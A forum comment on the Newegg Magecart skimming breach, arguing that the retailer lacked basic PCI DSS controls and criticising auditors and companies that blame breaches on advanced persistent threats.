New
#10
The article states that this hack involved Magecart, which requires admin or other high level of access to be able to add the malicious javascript code.
Newegg is a PCI level 2, or possibly level 1 merchant and as such, it is required to comply with PCI Data Security Standard, PCI DSS for short. The following is just a short list of Newegg's non-compliance to PCI DSS:
- No SSH/2FA for a limited number of production support
- Control inbound production access with Web Application Firewall (explicit web pages whitelist)
- Restrict outbound access to explicit whitelist
- Monitor and alert/block website source code changes
I also question how the outside PCI DSS auditor could certify Newegg as "compliant" to PCI DSS requirement.
Nowadays, data breaches are daily occurences and all companies are excusing themselves by blaming "APT" (Advanced Persistent Threat) for the breach, instead of admitting that they had messed up. It's hard to blame them, when the regulatory agencies accept this bogus excuse and there's really no consequences for the companies. Except to their customers, of course...